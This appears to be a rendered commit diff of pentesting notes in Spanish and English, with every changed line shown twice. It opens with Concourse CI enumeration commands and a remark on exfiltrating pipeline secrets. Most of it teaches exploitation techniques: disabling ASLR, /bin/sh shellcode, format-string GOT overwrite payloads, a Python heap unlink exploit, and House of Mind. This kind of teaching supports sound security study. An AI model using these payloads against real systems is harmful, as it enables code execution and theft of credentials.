* [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html)
* [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html)
* [Caching credentials](https://concourse-ci.org/creds-caching.html)
* [Redacting credentials](https://concourse-ci.org/creds-redacting.html)
* [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
{% hint style="danger" %}
Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
{% endhint %}
## Concourse Enumeration
In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
### Login and Current User enum
* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
* `fly --target example login --team-name my-team --concourse-url https://ci.example.com [`--insecure`] [--client-cert=./path --client-key=./path]`
* Get configured **targets**:
* `fly targets`
* Get if the configured **target connection** is still **valid**:
* `fly -t <target> status`
* Get **role** of the user against the indicated target:
* `fly -t <target> userinfo`
### Pipelines
* **List** pipelines:
* `fly pipelines`
* **Get** pipeline yaml (**sensitive information** might be found in the definition):
* `fly get-pipeline -p <pipeline-name>`

View file

@ -5,19 +5,19 @@
Aleatorización de direcciones Aleatorización de direcciones
**Desactiva aleatorizacion(ASLR) GLOBAL (root)**:\ **Desactiva aleatorizacion(ASLR) GLOBAL (root)**:\
echo 0 > /proc/sys/kernel/randomize_va_space\ echo 0 > /proc/sys/kernel/randomize\_va\_space\
Reactivar aletorizacion GLOBAL: echo 2 > /proc/sys/kernel/randomize_va_space Reactivar aletorizacion GLOBAL: echo 2 > /proc/sys/kernel/randomize\_va\_space
**Desactivar para una ejecución** (no requiere root):\ **Desactivar para una ejecución** (no requiere root):\
setarch \`arch\` -R ./ejemplo argumentos\ setarch \`arch\` -R ./ejemplo argumentos\
setarch \`uname -m\` -R ./ejemplo argumentos setarch \`uname -m\` -R ./ejemplo argumentos
**Desactivar protección de ejecución en pila**\ **Desactivar protección de ejecución en pila**\
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo
**Core file**\ **Core file**\
ulimit -c unlimited\ ulimit -c unlimited\
gdb /exec core_file\ gdb /exec core\_file\
/etc/security/limits.conf -> \* soft core unlimited /etc/security/limits.conf -> \* soft core unlimited
**Text**\ **Text**\
@ -61,7 +61,7 @@ objdump -d ./PROGRAMA | grep FUNCION
## ROP ## ROP
### Call to sys_execve ### Call to sys\_execve
{% content-ref url="rop-syscall-execv.md" %} {% content-ref url="rop-syscall-execv.md" %}
[rop-syscall-execv.md](rop-syscall-execv.md) [rop-syscall-execv.md](rop-syscall-execv.md)
@ -69,15 +69,15 @@ objdump -d ./PROGRAMA | grep FUNCION
## **2.SHELLCODE** ## **2.SHELLCODE**
Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\__NR\_” Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\_\_NR\_”
setreuid(0,0); // \__NR_setreuid 70\ setreuid(0,0); // \_\_NR\_setreuid 70\
execve(“/bin/sh”, args\[], NULL); // \__NR_execve 11\ execve(“/bin/sh”, args\[], NULL); // \_\_NR\_execve 11\
exit(0); // \__NR_exit 1 exit(0); // \_\_NR\_exit 1
xor eax, eax ; limpiamos eax\ xor eax, eax ; limpiamos eax\
xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar\ xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar\
mov al, 0x01 ; eax = 1 —> \__NR_exit 1\ mov al, 0x01 ; eax = 1 —> \_\_NR\_exit 1\
int 0x80 ; Ejecutar syscall int 0x80 ; Ejecutar syscall
**nasm -f elf assembly.asm** —> Nos devuelve un .o\ **nasm -f elf assembly.asm** —> Nos devuelve un .o\
@ -96,7 +96,7 @@ void main(){
}<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1"></span> }<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1"></span>
``` ```
Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA_COMPILADO** Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA\_COMPILADO**
A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código. A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código.
@ -240,7 +240,7 @@ Otra técnica interesante es el uso de **mprotect()** la cual permite asignar lo
#### **Encadenamiento de funciones** #### **Encadenamiento de funciones**
Basándonos en la técnica anterior, esta forma de exploit consiste en:\ Basándonos en la técnica anterior, esta forma de exploit consiste en:\
Relleno + \&Función1 + \&pop;ret; + \&arg_fun1 + \&Función2 + \&pop;ret; + \&arg_fun2 + … Relleno + \&Función1 + \&pop;ret; + \&arg\_fun1 + \&Función2 + \&pop;ret; + \&arg\_fun2 + …
De esta forma se pueden encadenar funciones a las que llamar. Además, si se quieren usar funciones con varios argumentos, se pueden poder los argumentos necesarios (ej 4) y poner los 4 argumentos y buscar dirección a un sitio con opcodes: pop, pop, pop, pop, ret —> **objdump -d ejecutable** De esta forma se pueden encadenar funciones a las que llamar. Además, si se quieren usar funciones con varios argumentos, se pueden poder los argumentos necesarios (ej 4) y poner los 4 argumentos y buscar dirección a un sitio con opcodes: pop, pop, pop, pop, ret —> **objdump -d ejecutable**
@ -250,12 +250,12 @@ Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecuci
RELLENO RELLENO
* Situamos en el EBP un EBP falso que apunta a: 2º EBP_falso + la función a ejecutar: (\&system() + \&leave;ret + &“/bin/sh”) * Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: (\&system() + \&leave;ret + &“/bin/sh”) &#x20;
* En el EIP ponemos de dirección una función &(leave;ret) * En el EIP ponemos de dirección una función &(leave;ret)
Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP_falso + \&system() + &(leave;ret;) + &”/bin/sh” Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + \&system() + &(leave;ret;) + &”/bin/sh”
el 2ºEBP sería: 3ºEBP_falso + \&system() + &(leave;ret;) + &”/bin/ls” el 2ºEBP sería: 3ºEBP\_falso + \&system() + &(leave;ret;) + &”/bin/ls”
Esta shellcode se puede repetir indefinidamente en las partes de memoria a las que se tenga acceso de forma que se conseguirá una shellcode fácilmente divisible por pequeños trozos de memoria. Esta shellcode se puede repetir indefinidamente en las partes de memoria a las que se tenga acceso de forma que se conseguirá una shellcode fácilmente divisible por pequeños trozos de memoria.
@ -283,7 +283,7 @@ Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el t
En linux todos los progamas se mapean comenzando en 0xbfffffff En linux todos los progamas se mapean comenzando en 0xbfffffff
Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen(NOMBRE_ejecutable_completo) - strlen(shellcode) Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen(NOMBRE\_ejecutable\_completo) - strlen(shellcode)
De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode. De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode.
@ -389,7 +389,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT` Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
![](<../../.gitbook/assets/image (621) (2).png>) ![](<../../.gitbook/assets/image (621) (1) (1) (1).png>)
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
@ -422,7 +422,7 @@ If HOB < LOB\
If HOB > LOB\ If HOB > LOB\
`[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]` `[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]`
HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB
\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` \`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\`
@ -434,7 +434,7 @@ You an find a **template** to exploit the GOT using format-strings here:
[format-strings-template.md](format-strings-template.md) [format-strings-template.md](format-strings-template.md)
{% endcontent-ref %} {% endcontent-ref %}
### **.fini_array** ### **.fini\_array**
Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**. Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**.
@ -492,7 +492,7 @@ Usually you will find the **DTOR** section **between** the values `ffffffff` and
Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\ Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\
For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow. For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow.
### **\__atexit Structures** ### **\_\_atexit Structures**
{% hint style="danger" %} {% hint style="danger" %}
Nowadays is very **weird to exploit this**. Nowadays is very **weird to exploit this**.
@ -528,11 +528,11 @@ Each object of a **class** has a **VPtr** which is a **pointer** to the arrayof
PaX dive el espacio de direcciones del proceso en 3 grupos: PaX dive el espacio de direcciones del proceso en 3 grupos:
Codigo y datos iniciados y no iniciados: .text, .data y .bss —> 16bits de entropia en la variable delta_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales Codigo y datos iniciados y no iniciados: .text, .data y .bss —> 16bits de entropia en la variable delta\_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales
Memoria asignada por mmap() y libraries compartidas —> 16bits, delta_mmap Memoria asignada por mmap() y libraries compartidas —> 16bits, delta\_mmap
El stack —> 24bits, delta_stack —> Realmente 11 (del byte 10º al 20º inclusive) —>alineado a 16bytes —> 524.288 posibles direcciones reales del stack El stack —> 24bits, delta\_stack —> Realmente 11 (del byte 10º al 20º inclusive) —>alineado a 16bytes —> 524.288 posibles direcciones reales del stack
Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack. Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack.
@ -542,7 +542,7 @@ Es una técnica para convertir un buffer overflow en un error de cadena de forma
**Ataque a librerías** **Ataque a librerías**
Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork() el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep() de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta_mmap y calcular las demás. Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork() el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep() de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta\_mmap y calcular las demás.
La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta. La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta.
@ -679,9 +679,9 @@ Bind now —> Las direcciones de las funciones se buscan al cargar el programa y
A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles. A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles.
**readelf -l /proc/ID_PROC/exe | grep BIND_NOW** —> Para saber si usan el BIND NOW **readelf -l /proc/ID\_PROC/exe | grep BIND\_NOW** —> Para saber si usan el BIND NOW
#### **Fortify Source -D_FORTIFY_SOURCE=1 o =2** #### **Fortify Source -D\_FORTIFY\_SOURCE=1 o =2**
Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura. Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura.
@ -689,7 +689,7 @@ Por ej:\
char buf\[16];\ char buf\[16];\
strcpy(but, source); strcpy(but, source);
La identifica como insegura y entonces cambia strcpy() por \__strcpy_chk() utilizando el tamaño del buffer como tamaño máximo a copiar. La identifica como insegura y entonces cambia strcpy() por \_\_strcpy\_chk() utilizando el tamaño del buffer como tamaño máximo a copiar.
La diferencia entre **=1** o **=2** es que: La diferencia entre **=1** o **=2** es que:
@ -699,11 +699,11 @@ Para mostrar el mensaje de error se usa el argv\[0], por lo que si se pone en el
#### **Reemplazo de Libsafe** #### **Reemplazo de Libsafe**
Se activa con: LD_PRELOAD=/lib/libsafe.so.2\ Se activa con: LD\_PRELOAD=/lib/libsafe.so.2\
o\ o\
“/lib/libsave.so.2” > /etc/ld.so.preload “/lib/libsave.so.2” > /etc/ld.so.preload
Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD_PRELOAD no sirve en binarios con suid). Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD\_PRELOAD no sirve en binarios con suid).
#### **ASCII Armored Address Space** #### **ASCII Armored Address Space**
@ -734,13 +734,13 @@ Insure++
**Trozo asignado** **Trozo asignado**
prev_size |\ prev\_size |\
size | —Cabecera\ size | —Cabecera\
\*mem | Datos \*mem | Datos
**Trozo libre** **Trozo libre**
prev_size |\ prev\_size |\
size |\ size |\
\*fd | Ptr forward chunk\ \*fd | Ptr forward chunk\
\*bk | Ptr back chunk —Cabecera\ \*bk | Ptr back chunk —Cabecera\
@ -762,20 +762,20 @@ BK->fd = FD; —> El FD del anterior chunk apunta al nuevo chunk\
Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra: Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra:
BK = P->bk = \&shellcode\ BK = P->bk = \&shellcode\
FD = P->fd = &\__dtor_end\_\_ - 12\ FD = P->fd = &\_\_dtor\_end\_\_ - 12\
FD->bk = BK -> \*((&\__dtor_end\_\_ - 12) + 12) = \&shellcode FD->bk = BK -> \*((&\_\_dtor\_end\_\_ - 12) + 12) = \&shellcode
Y así se se ejecuta al salir del programa la shellcode. Y así se se ejecuta al salir del programa la shellcode.
Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto: Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto:
BK->fd = FD -> \*(\&shellcode + 8) = (&\__dtor_end\_\_ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode. BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor\_end\_\_ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode.
Por lo tanto el exploit se crea: Por lo tanto el exploit se crea:
En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode. En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode.
Después de la shell code metemos relleno hasta llegar al campo prev_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink()**. Después de la shell code metemos relleno hasta llegar al campo prev\_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev\_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev\_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink()**.
Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode(P->bk falso). Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode(P->bk falso).
@ -791,17 +791,17 @@ Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo q
**"\x80\xe8\xdc\xff\xff\xff/bin/sh";** **"\x80\xe8\xdc\xff\xff\xff/bin/sh";**
**prev_size = pack("\<I”, 0xfffffff0) #Interesa que el bit que indica que el anterior trozo está libre esté a 1** **prev\_size = pack("\<I”, 0xfffffff0) #Interesa que el bit que indica que el anterior trozo está libre esté a 1**
**fake_size = pack("\<I”, 0xfffffffc) #-4, para que piense que el “size” del 3º trozo está 4bytes detrás (apunta a prev_size) pues es ahí donde mira si el 2º trozo está libre** **fake\_size = pack("\<I”, 0xfffffffc) #-4, para que piense que el “size” del 3º trozo está 4bytes detrás (apunta a prev\_size) pues es ahí donde mira si el 2º trozo está libre**
**addr_sc = pack("\<I", 0x0804a008 + 8) #En el payload al principio le vamos a poner 8bytes de relleno** **addr\_sc = pack("\<I", 0x0804a008 + 8) #En el payload al principio le vamos a poner 8bytes de relleno**
**got_free = pack("\<I", 0x08048300 - 12) #Dirección de free() en la plt-12 (será la dirección que se sobrescrita para que se lanza la shellcode la 2º vez que se llame a free)** **got\_free = pack("\<I", 0x08048300 - 12) #Dirección de free() en la plt-12 (será la dirección que se sobrescrita para que se lanza la shellcode la 2º vez que se llame a free)**
**payload = "aaaabbbb" + shellcode + "b"\*(512-len(shellcode)-8) # Como se dijo el payload comienza con 8 bytes de relleno porque sí** **payload = "aaaabbbb" + shellcode + "b"\*(512-len(shellcode)-8) # Como se dijo el payload comienza con 8 bytes de relleno porque sí**
**payload += prev_size + fake_size + got_free + addr_sc #Se modifica el 2º trozo, el got_free apunta a donde vamos a guardar la direccion addr_sc + 12** **payload += prev\_size + fake\_size + got\_free + addr\_sc #Se modifica el 2º trozo, el got\_free apunta a donde vamos a guardar la direccion addr\_sc + 12**
**os.system("./8.3.o " + payload)** **os.system("./8.3.o " + payload)**
@ -813,11 +813,11 @@ En ese caso:
En el chunck c se pone el shellcode En el chunck c se pone el shellcode
El chunck a lo usamos para sobreescribir el b de forma que el el size tenga el bit PREV_INUSE desactivado de forma que piense que el chunck a está libre. El chunck a lo usamos para sobreescribir el b de forma que el el size tenga el bit PREV\_INUSE desactivado de forma que piense que el chunck a está libre.
Además, se sobreescribe en la cabecera b el size para que valga -4. Además, se sobreescribe en la cabecera b el size para que valga -4.
Entonces, el programa se pensará que “a” está libre y en un bin, por lo que llamará a unlink() para desenlazarlo. Sin embargo, como la cabecera PREV_SIZE vale -4. Se pensará que el trozo de “a” realmente empieza en b+4. Es decir, hará un unlink() a un trozo que comienza en b+4, por lo que en b+12 estará el puntero “fd” y en b+16 estará el puntero “bk”. Entonces, el programa se pensará que “a” está libre y en un bin, por lo que llamará a unlink() para desenlazarlo. Sin embargo, como la cabecera PREV\_SIZE vale -4. Se pensará que el trozo de “a” realmente empieza en b+4. Es decir, hará un unlink() a un trozo que comienza en b+4, por lo que en b+12 estará el puntero “fd” y en b+16 estará el puntero “bk”.
De esta forma, si en bk ponemos la dirección a la shellcode y en fd ponemos la dirección a la función “puts()”-12 tenemos nuestro payload. De esta forma, si en bk ponemos la dirección a la shellcode y en fd ponemos la dirección a la función “puts()”-12 tenemos nuestro payload.
@ -835,7 +835,7 @@ Un buffer contiguo a este que debe ser liberado y al que se le modificará el ca
Un buffer a liberar con un tamaño mayor a 512 pero menor que el buffer anterior Un buffer a liberar con un tamaño mayor a 512 pero menor que el buffer anterior
Un buffer declarado antes del paso 3 que permita sobreescribir el prev_size de este Un buffer declarado antes del paso 3 que permita sobreescribir el prev\_size de este
De esta forma logrando sobres cribar en dos mallocs de forma descontrolada y en uno de forma controlada pero que solo se libera ese uno, podemos hacer un exploit. De esta forma logrando sobres cribar en dos mallocs de forma descontrolada y en uno de forma controlada pero que solo se libera ese uno, podemos hacer un exploit.
@ -857,9 +857,9 @@ Las técnicas de Unlink() y FrontLink() fueron eliminadas al modificar la funci
Solo una llamada a free() es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado. Solo una llamada a free() es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado.
Una llamada a free() provoca llamar a public_fREe(mem), este hace: Una llamada a free() provoca llamar a public\_fREe(mem), este hace:
mstate ar_ptr; mstate ar\_ptr;
mchunkptr p; mchunkptr p;
@ -869,22 +869,22 @@ p = mem2chunk(mes); —> Devuelve un puntero a la dirección donde comienza el t
ar_ptr = arena_for_chunk(p); —> chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->ar_ptr:\&main_arena \[1] ar\_ptr = arena\_for\_chunk(p); —> chunk\_non\_main\_arena(ptr)?heap\_for\_ptr(ptr)->ar\_ptr:\&main\_arena \[1]
\_int_free(ar_ptr, mem); \_int\_free(ar\_ptr, mem);
} }
En \[1] comprueba el campo size el bit NON_MAIN_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap_for_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar_ptr (como si fuese un struct heap_info) En \[1] comprueba el campo size el bit NON\_MAIN\_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap\_for\_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar\_ptr (como si fuese un struct heap\_info)
De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap_for_ptr(ptr)->ar_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar_ptr) De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap\_for\_ptr(ptr)->ar\_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar\_ptr)
De esta forma se llama a \_int_free(ar_ptr, mem), es decir, **\_int_free(0x0804a000, 0x081002a0)**\ De esta forma se llama a \_int\_free(ar\_ptr, mem), es decir, **\_int\_free(0x0804a000, 0x081002a0)**\
**\_int_free(mstate av, Void_t\* mem){**\ **\_int\_free(mstate av, Void\_t\* mem){**\
…\ …\
bck = unsorted_chunks(av);\ bck = unsorted\_chunks(av);\
fwd = bck->fd;\ fwd = bck->fd;\
p->bk = bck;\ p->bk = bck;\
p->fd = fwd;\ p->fd = fwd;\
@ -895,22 +895,22 @@ fwd->bk = p;
Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar. Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar.
Tal y como se define unsorted_chunks, sabemos que:\ Tal y como se define unsorted\_chunks, sabemos que:\
bck = \&av->bins\[2]-8;\ bck = \&av->bins\[2]-8;\
fwd = bck->fd = \*(av->bins\[2]);\ fwd = bck->fd = \*(av->bins\[2]);\
fwd->bk = \*(av->bins\[2] + 12) = p; fwd->bk = \*(av->bins\[2] + 12) = p;
Por lo tanto si en av->bins\[2] escribimos el valor de \__DTOR_END\_\_-12 en la última instrucción se escribirá en \__DTOR_END\_\_ la dirección del segundo trozo. Por lo tanto si en av->bins\[2] escribimos el valor de \_\_DTOR\_END\_\_-12 en la última instrucción se escribirá en \_\_DTOR\_END\_\_ la dirección del segundo trozo.
Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \__DTOR_END\_\_-12 porque de ahí la sacará av->bins\[2] Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \_\_DTOR\_END\_\_-12 porque de ahí la sacará av->bins\[2]
En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap_for_ptr() piense que el ar_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2] En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap\_for\_ptr() piense que el ar\_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2]
En el segundo trozo y gracias al primero sobreescribimos el prev_size con un jump 0x0c y el size con algo para activar -> NON_MAIN_ARENA En el segundo trozo y gracias al primero sobreescribimos el prev\_size con un jump 0x0c y el size con algo para activar -> NON\_MAIN\_ARENA
A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode
De esta forma se llamará a \_int_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en \__DTOR_END\_\_ la dirección del prev_size del TROZO2 el cual saltará a la shellcode. De esta forma se llamará a \_int\_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en \_\_DTOR\_END\_\_ la dirección del prev\_size del TROZO2 el cual saltará a la shellcode.
Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload. Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload.
@ -920,9 +920,9 @@ Esta técnica ya no es aplicable pues se aplicó casi el mismo parche que para u
Es una variante de The house of mind Es una variante de The house of mind
nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int_free() nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int\_free()
fb = &(av->fastbins\[fastbin_index(size)] —> Siendo fastbin_index(sz) —> (sz >> 3) - 2 fb = &(av->fastbins\[fastbin\_index(size)] —> Siendo fastbin\_index(sz) —> (sz >> 3) - 2
@ -930,33 +930,33 @@ p->fd = \*fb
\*fb = p \*fb = p
De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max_fast esté en la dirección que vamos a sobreescribir. De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max\_fast esté en la dirección que vamos a sobreescribir.
Dado que con The House of Mind se vio que nosotros controlábamos la posición del av. Dado que con The House of Mind se vio que nosotros controlábamos la posición del av.
Entones si en el campo size ponemos un tamaño de 8 + NON_MAIN_ARENA + PREV_INUSE —> fastbin_index() nos devolverá fastbins\[-1], que apuntará a av->max_fast Entones si en el campo size ponemos un tamaño de 8 + NON\_MAIN\_ARENA + PREV\_INUSE —> fastbin\_index() nos devolverá fastbins\[-1], que apuntará a av->max\_fast
En este caso av->max_fast será la dirección que se sobrescrita (no a la que apunte, sino esa posición será la que se sobrescrita). En este caso av->max\_fast será la dirección que se sobrescrita (no a la que apunte, sino esa posición será la que se sobrescrita).
